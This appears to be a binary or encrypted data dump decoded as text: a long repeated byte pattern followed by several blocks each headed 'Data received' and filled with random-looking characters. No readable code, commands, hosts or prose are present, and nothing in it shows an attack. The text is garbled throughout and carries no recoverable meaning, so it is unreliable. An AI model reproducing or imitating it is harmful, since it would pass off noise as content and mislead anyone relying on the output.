ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8*ã8+ã8‘*ã8+ã8xÍyÔÕøª+ã8+ã8(ã8+ã8+ã8+ã8(ã8+ã8+ã8+ã8‹ó8ùä8*ã8*ã8*ã8(ã8oÁÿ+ã8_Áÿ+ã8OÁÿ+ã8?Áÿ+ã8/Áÿ+ã8Áÿ+ã8ÿÂÿ+ã8*ã8+ã8+ã8+ã8 ø­+ã8+ã8+ã8ã8ã8)ã8+ã8+ã8+ã8+ã8(Ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8)Ã8(ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8)Ç8)ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8*ã8+ã8# ÿ(ã8+ã8(ã8+ã8+ã8(ã8+ã8+ã8+ã8+ã8+ã8ãÆþ+ã8+ã8+ã8ãÆþ+ã8+ã8+ã8ãÆþ+ã8+ã8+ã8ãÆþ+ã8+ã8+ã8ãÆþ+ã8+ã8+ã8+ã8+ã8ËÛþ+ã8+ã8££ÿ#¤ÿã«ÿ+ã8+ã8+ã8+ã8+ã8+ã8£ÅþëÆþîä8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã(ó(ó(ó(ó(ó(ó(+ã8+ã1 Ã1 Ã1 Ã1 Ã1 Ã1 Ã1+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8+ã8
Data received ¿ÏÏD ¼µWñI~"¶¸-Å5 ã$2²ßÌ·Ôh%ç <%ÿ2mrµL.53þ-=¿_YËÏ Ã׎–4Š’ª·­Žq,m z¸¢ÂŠáQ— àÛë·ñkÜ\¥Õg% 'ÿá]î„ 5žý\P".(õLØÛ‹OœÎ1_«pg+ܔ(á5Œ Ô,ɉ4(ž-eâEø…Ö»ζ¢šF{-ÆEш`3;šé|ËKê- E½¨ËÍ9l¡˜‰)òsr'pY¶`r]æâ,1>¦Ë÷2çld´ê‚e6Wf·^Ú¦jê 53þ &¾œ#%Ë@g?-Â/]‹5Ŭ‰+0s!ƞÓ[w)Œæ·Y+mþ*Œ”ºŸÅW ú&òá'·Ö ÿu~7ąçZ!1Ë;‚Æï_ÔêdÃëüd Ásöò¿2±a;ے‚)ºóš–ó,¥×c%ºö՛pżS×ï4‹Íä~„ë¶"“ú4¾aàÑ;÷ú[R ¬x±!ójð¹ÖùlíZð‚`“÷glWyÈ»%Ö26}øþ‡)É­ ’(i~‰æï8 áícë[ÌT0•û¯¥4Çp©y‰7?üÀÒ©È&é5âÁ'öÝR ¥~ÅZ ³õìÒ/)Î]:•çV Ç3ñôª¬Ä¥¯5ˆ«„ݺ½òž­Öù–@ÊJÿÙþcµ'fÁٖkd¥·1[„{¹½—ûÍV®ŠÏ¦Ö/êf¶ÁOéÝ[þäq)Y7!Ïf¶^¨[¢CÖu‡2kÏUì®é1Þô¬pˆhR@ª{®NÌcST[ìÀ0þ~쇝x`Ð ZP¸’ï~ið )ÂX”H?8MÌ;6çÃâÓuË$J¸`„n^î PZ4þ¾ëc`0‹hô¹gU$‰ßù f‡3\3Ô1g ‹Ï´ªBD)hÝXJÝßOQ¹pÆÓŠ·’Ì֍ïáæ)ÑZ;² ‡»4þëÀ%îÄzpt^ío1ó­€h§™yŸQÙÄ;ûa3ùOS»Ôí{ [˜ n„þ} %ÓõV¨W4)ËÖ®61 ô.¿2Â4òá2>Eë…Yˆ ¥ûxDì ‚ëI×ó$Ç„îoh‡V…0÷€û–íw!Eð˜¥Hø¼E~C÷ÛW¿¸vÐN_¼ÿUQhPÁúIu僾€  &‰ÍYþÅ+ïéí2Ì®r Rÿn™°©ø‘z¿{JÁ⃠ÐÉîgç³.xˆÍ„MíÊAûC§õ@~^Ñ^!Z Ø€‡£GÝ}1Ø[-Òá"Qós é´Rà:Â0Á¯%YX«Ž¶Y÷…‹9¢‡N½ËNÿ˜¦h nCq6yö)j'ÕB=wüÄÛ%bãwBë#†dJ\YóŽª¢¾{‚®gäB½wN¹Â¹>ÿwÄ~Ð†Ùʁ¹yºQå;µK3R><Kî-øx5:þ-ØFiÒòzuÅ[¯u³® Û² )Â7¬ƒ%y…Ið=]Û`JâΉî̂üòYÊ;¢n×Ì*6 Á¿¾ÊuN½Y/ñ÷‹CÖüéÿbwÖ`Sâêße> }q k0ê ÿ½ô¿kb_ÖHRä-þÑò_ù¯Í\1:øÈËÖ²ë_L8!c\bñdk(F bùbÚy&Ÿ)'ÌÙ[ق'´Y'Œ)Á-ë ÆbP~0iÐïŸlW—aSÎ/Ëùã<f§w<»ðŸûœ‹+tA Õýj§›J¢%Ú–éúú·Û¢’-ë¢ †‹ÒµÔÇíD˼ª™|+åÀkv$.Ÿ{ø¹/ÒÜÓÉq 1×ûë„áúíóÅÆgòxÊ[ŠI@”ϽOÁ¿(¾  ,@)·ï‚Ç öy-ä[à !æ^+ö—'ÇTV!9~¿šYßù7>ύW{¢Ôv|OíG‹Ñro‚ŽÑc^²ÿe_ª07è ˟ٕïŸ(Ê4(ëŸa¾Ê:˜™R[)ʘ~Π1)ö™¦»ß‡Ê%ùÂÎ1ñWVwZ[ñlVНN‰~8oNɶ7'è} §¬ÊN¬AÒ¬)Öu­’Éß æ@têRUÇ'S§Ø`´ôR]Ñ/DCðòbWEìQÉ5y%–ÿä÷&^ëfʅ"Âô¤D1½AAghòóÀ ¿?j!º/Å ¹Ãb™!{½׳Š)ò_/Í5 <fO ^-‰2þæÅÆ4ÔûÍÑ‚úWù•þËÉÝÞN¬-Á“¶%Åë³¢2)Hó¯dkÎf¤^Ëæ[¾)tnÿ:¤ÂºN©½ÆÍ½qò’҉ͽ?Në ÂuÛè$–I–‘½…j꯲“îšÑ^¬îÂÂ)b­ÙýD÷»ËJKá»+܉Yò‰’ª³2/ÁXàbӘ ò|ÎhÎ%ÖëòBÿùâE¨ŒP„Ä-5{¶•ÎÀ'+ûž3¯¹’ÆõÑÁH/ Û¿T0e»)Mê~&R`uã(bÿYÏ#9Ç[ª7eçï(‚‹ÉžÏâ!ptóöûŸU¦æ$]Àp¾¾1rÞbï@# û_†û(ï!K󭧉Ç1¾1{á zÎ[£’‚ ÷UÁ²R…Z÷ÉÇwѕB1}Ñѓ÷ªŠ@V,®òÂÓøDKî‹]K%u®’3+~jÀÂeæ×^væÄ'ÇU–[„ž¿È©š–êŒaÉ5»Ðf,)1Iݱ9¥|ÌRhÝ#,9¦R}IawÑ»ÌìÃ4‹6—û­¥ß²æ_ÅÛ¬$¹/Ì¿—ÆÉ¿{é !ß÷ìéŸû‡±£bÿSÓ/þWrJ¢”¡½¢1ò_Ί. Ó*o6é!—¹XJ¯)8*«tâïÍ|?b!ÏÞeÏɀñGdT¢ÿ’‹©_©ôYOZ®-y:Òzÿ¢é~éɚx}Ev4ËFƒ!÷ŒÁX· Ãð$Çÿqï(Åг »æçS( ó*-çvX1ø  ×%«‹?J%ÿýÜJÿÜß!JþëÙE«îæ©_èÍ/Ð×bÀ:¼­×ø˜Å-íÊ e‰Ãå†/ó@'âIa0¹?íô‰åŒÇ«ÊáC‰ ÁêòºÖ"8_n:ê=Õí÷nÊ!N Ú!1O÷¦üSÒ þºsù²‚Þ¸ Æ óÏڒøÍ®éÇ+¿5îʇ_Òk(ÓÙ­Î5B%ã© õO—§f‹Z%ÌÔ˜v¬”•…»ùþ¸âÆ×Åm3û ¿Eϧ+)Áï(0ȨŠ+i¥~kð‰Zêþ9éÑ9G„î@¶‰N«9þp@' k¹ME z£ßÊ®)œ<p'ûÖ¤Åá˜ùŒ[º§¹€脲a)\”¹òËõ*)å*ùŠå»„‚5î,f -ßß3LO«hß!r˵†Å19B -ê}–ˆ^”ï¨,¤®ÍLizÈëD5Œ+7¿0ï¹·e÷<«ùÿ 1Êt•À'uz3æ^Áª-#jõ¤zèPµ¸Âê1×ÕóOB Ïl
Data received ÎÅø±¤¯ñäÑßR? ýQÅiÆÊ°Í ¬ë½xiOêí¤” À*Aï>”¢hÓ%â÷ÁØ/Ìl“¼ J—ž6øî—þ®PЏ±Aá#w/ÎÓ¶$<ª.-Æ-[îï(Š ~ÐNʾwlÕ÷®öEÒ{ré‰ü¹Å¿®t,ãF%î–ã˜0µNƒzýºÆ]tERAO‹.é;—a Ãa" Ô‡28×>&)ÖàÉÈ* ÞµlZÆùî”ñÀ!ùœuóËQJMy\~²ÍÏ&+øÌ¥•¡¡ϼ±ä®DÂ'·0K¤ÏǦòQôýæÏ% ×w‹KÅ¡ ¼•EŸ(×Ü´ìc)1÷NÒKïuÅ£5-ò1F˜Z0Ó,ÿÊ$K¯Ì¹Y—Ûåi}°g)ʀÉT9ó Ë袨áÂ1Z.Ñ*›´Œ—÷2΄µßèBÒïð}”S[ÛÊ[ÞÌlÁD L“7±!Â;Æ~)jkãèb.Ùº×1ôú;£C!ÿÌb)RÉ~J^_Òó«„7îu0³+û»Û Å̯÷$X¢× ð1_òæJ úðæ £%J8ÊíO!u “·ë«ŠãJ2HãÿǏœ8Ez„º¨¸¤»Ï%ºÎŠku ­u)u…cñÿ²ðÊò$)ù¾¯èž¥ºÝÚ!m‹á_ß%ñ@å*ÉuÊ2iðQŸ–R\ö N¬ ¢êÕgTÏê‹$Җ%x°åÙMFEY®âì֌x IZœ"ßæÒ ˜ÁD…N×èÂ/dƘELqD'UÖ$¬ø !ÎÖÅê™ê3¯‹Ï÷ÌÉþ!~aâ© u ` `”6S5ÛS—OáïkŒèþ¦X¡9ÕÒRóõìBã~Kâû9ßíø×õ—]ã2øû«ÒÅ-? Ö9VÀÄ$Ùâ3â; \ŽÅ» (Q󆕑p!0÷Ö¾üå5DzëI öŸÀ*Ô̾ (û)UØLˆ·Á¬‚9 Øõe%ñº–Âê-4 4’µdÑ+ÎÚ%_ÌÌå5°"z„é@ò՞çðÔUe§½n4 ø »²m‰%\te ûq7Ø1ɸ{øÕ¦~9È*ÀLÒ‰p+È3b.%¢ ‰ÐÂä} êîŽvZ˜Ç(ŠýØéæ•%_s¶Æ:òҜ…9µý†…©Î÷…·„yZ¶0vxþ¡çùjŽI£“«À Þ¾•vrSúÖwôqéqð/ÁÑî:)—À%èvä¯ügÚ°êŠQèIWYtd殣"-Κ`þP§Øk®}œÚ'Ù1à)ð‰ÿŸ3¡«;)‘.¼éÄ!ùãj/îökqâôÍþJpÙé;ª) >ŒžÚŸøÄåÙø8§Ö¼ûæ(Ê8NûÄöÊN®›ÈN«™x>ºyÂaâ/¦(w•R–×%¨‘°(ŧ ²#)ó/±>‹;+êdÀŒ!d:V‹ý³Àñ,c' Rô/)úQ!Í-Vh\Ê²0Ä1þ—2¯ÝÛKÄe)´®µdé_ŸçuGÎ'ÞGÄÇê¹9×È4ÿ$ÏG¿… ÿ™¶~¨5ÖP)/ÄÙêò¶‘  í=Ӊ3:«`®Ã˛€ 1ÖL£*¡U]'î­ÄÉïùû-A…+)?(AŽŠ„<Q¿¬»ÈãA!ß)t¶st Mè³Ktv½i/ey¾Zº)ôzµ‡¾tkëÙã]¦÷œ «yxœÿ1tÿåcÃ%º]›^5ŽÝ8Æ^e;äϋ˜ÄJ% HÑú§…ó±H>qœË$R[»ßå-®\§}±Nç!\Ë5A+6¦ ó-“ÅØât~·\ÆR c!Ó)Á¾ëÏÎ ‘U–GKìò²÷w5Ÿ…ë£ôìʎ(%O1‚å5uççë᯲y‰ ]åo!éº/ÿ‰ëW Ы™©/ê ‰Ò9nÊ?2¸TqRâ&U9Þ»>®(â)8S «[¨9‚ÆjÕWvƒS¢î÷lœ†Ÿ'!w2,ÿӈ¦!e!¶)þa÷¿ û¾0‘5ª/ï:².•K@r•Ö®êûÂê@ô½PŠ Êø‹¿âïO®Qú²]ŸîúË-ë|÷ÏÖêbà×÷nå¹kú„˜ëW몕H‚îº]\òRÌ©/1ÒÂçÞ|lN5‹Ãªd)ÆìÕ_þ»t‰[aJÔ©;”Ò¬!ò òè‰ÁßÑ~”Ê1öŸú-ÿ’e÷„žê²çÅ1òý}áÊNÃþa| n({ \ƘiwBŸfXOÚ«™ w#$ãZnH 89;»²gZcûe¤¿-/2_}tKZß¼$páoÂ3$Wî2Ó`W ΗtOZj4ÔRÂïuþ]Q@bö!Áç:Z€ Ø øÔÔqµû1ì (j)—Ué®-¦{S÷V !ó5DÓbþü+ÝF¿µ‡5ÿ­D[QªHW1Ð)öÑÀÙ>Ùskåék².„!Ûû2¸ÀÊæÖûP ÈO-»rˆ€ÌËöґAØ0v)OМ# %ß»wåe¯@ !÷–"g)Ée¯L•ZtƒnâY{äËÌ2ÕøâKë®)Áîâß\ ä¨B3)Uì­%%(Å ‰é ÕYçIÖõéw–·¦ó•Öaö 1»öWJ³ '¸°ŠŸ–¶.ç@¡Q¾*£k€#3zc”Zhø )ÞæÝöþ·û'~–UØåêry|*-‰øÕ§özÜ¢ÎZ@){8ىf¸Ÿ7¯_{q˜)>Ê9`$ÒOŽ!¬ VL ¨~ʯZŸŠðû­|-Yö.- cvQ´6–+Ǔ ³«‰‡_óŽ%ѕ–¹¯-¬¥.ўB1ù÷F¨/ AǝsS¥]E÷,iÿ”—š.¶›R}§‹Â{Œ,e¯}g—A–ò.Ùhb™‹ÊY«§ùž¥~ĉ ϔ#'+F@-9ÊE@eîà2€•ç¸1ÙÒ!ЁéŸÅè­_Â:¯ð“‰1Ú Jøþ-}¥² 2`‹>•û¸ 8–Y&ÏÓÄ %é‹N¹KÒ¥zz÷†[ö¢)! ÁÆYküˆËáÙniÂ|\ÉPߝ +·²gWVëZWüËf7J ­ˆËöy‰KBÝE-I% Ö¢þóÔêF)Îi| tnkTʊ‰ib:4FÌ¢'ø²µÁ,à Æmµz×ÙÜB!Ö LJµÑöo,}JaÎKK¦ 8 f1ú}Ê~…èÏ¢ýqc¦¯iùkäÿOðñ.*ËbCC^î @ÇÙFw%)Ӊ|nÖ%5$探éUÛ)¥nø‘ã‹39¸ó@Ÿ˜’Î%—”“—{BÁºeºó—@I+J92´Ê©!×Ó×?Oâ7‹ºå“1¬0Z1 €)Ê&‘!úèÒó€Ê.J؂1 aRæ\«$ÉÄYòÁ Ø»Œ=ñ‘H‰)>\vKnd/èÅ×$´,9cFñó0§ø OçêtYûÊj@K1-öÂG‹€ü/'Ôé­^”é|QiWæ1V:KÿÎ^Kð;æK )ª`ñw…öÎ\ vçÉÝñB
Data received Ãal´KÎþЬIâ™î(ºÒ¼›Ôv%Æá î~‹V @¼’üiËþ³¶ ÖëÓêEøïòìÖúÞç~ÅÅÎë‹jbšëöÙoþ¾)°áÓ=‡93´öÅãþٔ+ŽÜ$æôÉnõ·B!ߝö:Éå¨'ý™Ì÷.ì÷ÓÄàÎGZŒÿ¬³µš°}ŽË‰ÛD¸ûuÆ£$ÛÀÏòêÅò+˸³<ô͸?¦n.ê‰Ã ÑÚh¢iUzغã·E“¥óxKtÎË(–§,!3F%ÅQ'âtJRté‡ÀØ#ñ‹½¦¦Ï%e5ÊêÁ}׿c{’ý鉿AOîÉÏ&ìⲇÅç@èä ÍþØò,ùz¢Ò¯Zþ,ñbƨQmB‰ÎS?‰!VVX\—/~&ÓL%by:SvbÅ~ÙR÷¥1jøË5D[Øe¯ÿ(ܾ!"W¿(ó7¿ow§^Q%×E/&* ïÒìÄé ²Ð‹ï^"éQékN\Jé/Çü˜[âêßEݬ¢ªœ.á[@-18…¢òš©¼Tßë2}ð) ò1‰ñ€ù`o“÷õ%gY©7éÉE§d[ާQ¼úô™Ë}fäê·SO Æ“Ûæ1Ø Én³±Šó.‹ñٍIW{†/{w)û×uqߥx1—”·%3Æ VÑ%÷ÝůN~d1Ò÷ŽPScJñÂfãA›/ëb3p…H>ºóv'ÿ—þ)OÖªeÍX§Ñ¨ëâiŸJ«uݍl;´Ñ«´úËSó¼û¬ô·VÂ'^ÑP¶iøe\µ[´2:îÝü@”ER±b×{§³„Œ¦³´=/ÌÒqÝv|xċ¿27Q`*$³ê‡J\ºÈc×û_,§ý0àÿ ü÷zí€(PQ¹`úûÀöÉ1ž}Á §$ïo0j¹Å:÷ÙRmhj‘Ì×P~•,÷|“sÝù¼Q rÁÿVÇ8¢¶‰ã‰û_ùÇ1Ù[²ÈYU֓gÒénD€h9jê¡StÀ^XU½þ§)T1ŠK]‰†9âþ!ö÷– )þ0A%ÆnâøÚÜu|sR_¹V.ª$V‘º„² à èPYX†AÿØï*î0Xþ_Sèóçú×[ª¼â6VTUÔþdÆ W¿U=÷תܪbÂ`(Vÿ¢^š\<ªÊP[J4‚šKD ÈNo/äØå]Fý-ÓuÈ-vÿmÀ7SWV¾„?»E¿¦å²)÷^Ÿ9ú ÓZ_ÒC$ç}Î/ O= Ð­'%ß;&R@ÖØ‡qò)’Ë+£ýe\‚ѱßë)ók]÷Â&ؖÀÉÀ¦ù ÿI)dé&÷,k ÚäÎ_ÁîThÌ?<ù¬XvÍÔ~ìA´Ì~V¨Ê.%^2ÕdP»ûîµÁëRº¢íÞÂb5Ð ‰®ypè{3À0h&b`BW¸ÅÌßT©Æà XQ‰á]çÈ\X܀œ/;ª{-^uÌó—U›ÊÊ}~Õh¾Ê•é_[ji‰X|…&¼RÝmø 0uª$¯•H/2Dø}|;§ñ•‰î€TŸi}ÒD—vqRUfb,‹?„­2mbîßY¿V«‰ Ãuβâ=Và‰Ú7Ÿ[%,ˆb1Ã]4Z-22•[#Dïú²Âš(üUb)Ï]ìýNǶªéòʀ3P)‚fÅSï( !Â]nã@Œ1”yZWFµŠU}0Zö’°Ì®IÙ K¿(ïÞÕ“…ï@¢6É[¢Ë–ø„Lm׳¼”4JîeþŒóŸç Ãàäa¨Ø¤ª7ýiþ3k]‰‘ ]´fùAG)Ñ#^^ó`%ÐsÅ<N«È@K#ü¤'(nÕ'ë`;À‰ ø!Ð)y"’ºº³­–ÜââŸÜIYÂRsâՖ»KÊ2÷C¶›ú¬®_1òêŒÃÿJ0˜«Âäҝþ®ÝhÒê¦$Vº@—·J¿u\tQ#zÁ œÔ°e,92úy6ã‡Â[¾u|ûZB_~±Yö:13!þ¶{ŸÄƋê9,~¡î ,I¤³ë1þáfÚÞNÍæ+¾9;­²–¾IÅf¯u”»µûé'šhÁ$“‹ÆöÜzU.öúl½ÛŠ–NÉٓŸæ¬Pµþö"^¹½¤!~‰Þ+¨à1Ö)åH7Z.‰%Ί‰¹æoìy¢ZÕÌÀû+˨ZEè1¡° j¹…ê$èæËÃñç“(¾m£ |[÷°/ξoË}æÂ[¸øi¶$¶RL€Oø€¤dÀ„=¸É-WÆBMò«ˆ–5þ-ÄlóÒð[Èu$1Ù!ËÍd>°=Àµ8£ÕZb/!Å~ -óôP)8/1Ë3â^Î)÷TVüu¤ïÉk…õ·Ÿt_ù¶Fò(,4‹Z9¼pr\Ø´ï—uDÓýÈ j%å (¬»ËùFõžDbÑý¦ZZ}Û0ÿ—Lhð!^Ê·è%ÏbùþP30/)Û2»Ýº=ß{­~SÚëW~É人²õ„÷¬m¤!m!0¥²ÎX܀–ûó³K³ÊËTu Юï>Ãò„*…tE *äÀ‘—˜? ϟ™­Ú+<z‚¾ò×± ó{³£_± ðJ¿bû7_\ò߉ÁNq•Šud Kɼ<å¢-5ua•{è61À»ØžÏKÊ>Oýø—®i;õÐ+)$?­ÑË÷quÂÃg~sP —Sž‡ Ú{–Ž•QBËüÖi]ñ ïbÎùºKw˜†¶-àÚ; H4wZÊô8¿KÝB?1a‰ómëŠï8-~!Bê ”Êþא§•E¯'^ÞØÆ€¹ip¹'Ǭe,4Dëì¤Åœ»¶<Z4¯Vœïœm1`øn± kµêYĺ—W”0— žy:N© SZ¯‰P”€µ a‘ÊÀÄ1Н^im :§JÛ!À&ô1fª‚²,¯Ý=KÄÔïáöd‹}1µþRN¦•Ûž ëQI )]‰IˆþRýGÌ%âÉÞá@PÓ£U¦r#—$Ä«÷»kThZ©ùÏ¥×F֓ Ǩ¿ë*,ûϵç‘âi¤„Ʋ«-Æ@å%÷‰ ~Ù§Eë : ×)_÷½ý/6Fù?¬v¦HöžÉÚÄPMX—NÝZaº{蛱 þ/g T)«¼:× ÆÉ2òuA…Ñkã+H®OÂZÃÿq˜K\5£Ç ñ$YÛK »Iړ)ϧ! %ßùb·ÕlÉHùñÒ1«™!ÙÂ/ú,4Ƅ•Fù¦Ã“,¹Soã¨-ÉÕ³ 4žûê­­‰ÂÅ 1ىgd%F@_)ègzJ㿊µ'é}E •b;²ÃuÞG%–lZ `·ß‹Oîd\î‚îñ×4ôྠ8.Dޏ³ü»µÅ5¥ðQKÊÝ4x˜ÕNÿ«ñ¿Š!+Ì>1•|°eʯ÷…-Þ^$kÞz¾\[?ötZ‹‚>ÇKty¿™k:ãê%š`õQlx /ßv’Z àuÿ÷Àbr/ÃqÆ$M!&Z-Cqìr‹Óñ‚83É~_Æn¿Ø·_–s—Ço㏐àBØÒ÷EYÐ×fºv[þèÁÇʹ eº5˜ù`Òî¢HÉÂ2‘TBi:ÔÂàEJ­Ð™Z)d骎DTzÐ%»S·­dŸ¿YÇꥭnç'3\Ëß³žJtꊌYwûe”ªj¥ !ǎËSêÙQ>º3§ ô„®éUŠ÷(D”ã¯Çþ1 (cܗ2·Ê˜Ž.ë'Oôð(ž¸QÏ'æ ï ÒtiyP?%ÖØ×¿|´6À9;¹òàQK`§b(º +1 (='«yÑÍdòᓾåÁzgðÅêíF’ºeÇþ([a(I»Ÿ™CÝþ.íñ’üÅËöUîӚ^½ }Å©¿«tSìrŒf®m_{H;ƒŽêø5<«¤[1œ¹–uÍl/sx !󝂃BùMý¤¥]°8=²å¥þԥęÙ$uè¸Æ‘ ’ ëád'Ã[èP ñÞÔ ÉÑ 0)É!Æ·ìÎhÖ8ˆ-YcI^shó,ëZÑa¬ñ þ1ËäǷΝ\0é_ñ“Ã9 ´óæ3ùáºÂ%5îâ Å÷ìõ±ç€rÈ%Ô«É]xZ-»)ZnÈ,+ 7‰Ï»_eµ%w˜ø1Êïk²f˸]å(-Ùf!3 $åȓ®³EK¿-#•uO )Íqäà‹1|)‘¤»#Ö-P4[ÿ®-j¸±ÔëX£OË&Ze……êÃÇòÚE¯üÎϺ«aBÊr©ƒ1× ò)îµï/æ-¨Å /þD îy2hA¯P·T Zq1®µj£WØLЗ›%ÂÏw‰auf‚ØWšýq-t¬ÏIGú ‰øR×Zxî1Èç ]Œ”<£'ÇÞôȲ»®÷lYϒ+AÊ¿uzáW2uÉ>Ô"Äþâ2³ëòÃ#T4ª˜8Ÿq#ÉâgùÐe‹ÉAæ÷y0Ot_X®3cÀY¸ÔûãÊ9%÷LâJÆèLÖ®xe%ï’D@ìޟœÕÂ~ÜMd("ñ‹TõƉë!&½Ný>“ )º^{[êöö¬Äñ$Ùäñáz­óÄ)ïö?-$eK¯(1ò¾"iõêîó/§ì_¿f1^Ç5âRß>™ùhÒ_Êk,èÃafÿ0M¦™ª)ý°)úï¨Íµ„¨ Ëò]–£%ï”'øö•|äâßì+‘­Ý)@²4jñ:^Tƒ)¯\.ª)60›¾™rɰ7)֙…“ûÊæ ŠÁE¥+ñÚâÉ¿õÅ--”UKó镒°@±ÇbÇô‰P)аI•1Üãx†Ò0Çˋ?—ÑƧ®Wâ#[üµ„£‰Ç‰Ë[Ô%Ö:ÄöìýÖ"ºWå_§Ñì¥ösdÃÄëü²¤Ó¿`1ÜòO%½@”ïJ7–ê€od}ªSÔ¼¬K²j–ìœLѱ1Þ+ðøÎÒH³P_þ¯)ÄkÅtèæ%€eú-U޳·‹ã¸d¿S°»[bí·’ðÁèé³ ;Tb3ýÙ%P ¬ í쐅?9q-ï˜Y!ö:¶åR˜p‰Û½sh)+§vá%–š%ãå1,ÄÈ«‰j„èîaNǀs‰ÏG ±,Æ%(¤12Î+&ëTär\MÏ¿ŠKrñ(-pvZŸ ð%UOÏ®Ý$ì&•'Ã~ÿ‰Ñš}]Gš¥š½×{–Ç/ Ä{¿cßõèí¥ïh % ,1û/!ÏbÇwÅð-VÑõ(¬./ñŸôÖ½±ƒë øÙ‹[ÿ-‰;ª4‚á0 0‰ +xz½„ç¿ë
Data received L9`€Þ ŸÙaø.,{‰%½!!3#óÿijüúȖRÜ ×Р ÷«µ–·HÛIÀdñª7%¢aq³£—÷ÕM^×Xl½j€ÈèKû„Ž‚ve‰Ù[‹ˆÈá6÷ŸQ74ñ*¢òW_ªõó‚|¿M àÿ‘,[¡y€Fë$(9Ôþ<¬ÁŠR&Zz“‡fŽ—Ò®˜å‘ƒÑgs@dÆWjMÇᘉ…>”û¯ñ€[ÊÀ­±Îhñ•Π»ÿPãë¹ÿH%O²‰×_ÆòO½ícJ¶}–o1ÑÈá¼AKâ3HÛ®'Své2êö…‰éX\}q %›& óAœëÍ@=X¸„p³—’T4¸jǗSn!÷–~—^$NÖ¿)~þWôfÏ)M¿ÎÁ¦Â%­o’ éö0¾Ôú»VðØÄBÆÁ’ üê}sxf¿¢Ü‹?ò¦·ðjÿÅψې”!C\ ÀA 0ìt<>7çÑޤëÄXò›  z#•±,è.$« 5ãý¶ Í_€Šy+•y“̈÷=û¬&P_ O:í(‰ô‹F‰&…l§ªÖVJJÙú'øo¯e+®7ä;H”õ¦>Yá)\èk¹`1Q…Käñ<«ia ðׂTí‘%)~¬ ï!éK­øÀ,³L¿y ÷2¨ˆà½×9Ÿ&X(eG¥ þÄÛ¢ƒp,ù>k؞çƒ a´ØÑCâ0c€ç÷3ø¼šJ ݉€}M®i[ ˆ` Äüږé%a×õÎÂ'¹À©ÿU«áÞªNòí¦¸møË Eƒ8Sé‹ß9\Hh0~iXÞWJ1QI 1ÒSs„îšå¿øùW¸y;‹ûøM=þJ¹É¨ŒQU¢,Kb> UÚ+^ÿÔX7‘ÁqþÐOSñé’[â7µ0ìãÞ¨&¢ St©nqK^â¥]7 C5‚¶/U²¤WñÙ%Fð3½ëßD®, SÀÁÏ(1KJPʧ[çE Ô`Þp£%Àñ"Dڔu™ø*(ÖãKÞȅ¡TçAJä`“Vyß`5ñA*>³þ³ ±ö8yƒ'êA¸^–8ÄRJ~ô_ъý¡1A{Kå(föò%[_ÂUÄgŠJ©"È •)ûÍÙ ý+ „ _rC JýJ¨’·Øí›êõT?i²öO9/òÌl'ÏfÓÒXÖ¿O«`oZèDmð"i[q=…P_©rOùB“¨o­x«K¯ŽP[ÌzQ\YZ¼€9§üñ©<e‚û?€À‘·KٕxÙ+[j°Ð™l,@gm$M†;%QÝI‰qA`bÓ·&¢ZR»røŸÐN´£@{£BÞ¼úÀ`Ä&ŒÆæ=ôʨëUDÌT`‰>?怞<¨CRä+Çf&±Á.æo7—d‰«ræ +ü Òɉ9 nÔà¶àñh T֌½þþ‡åûéVa`ª%Ž;N€Ÿ˜f»%MÆÄ¬™< éãù² 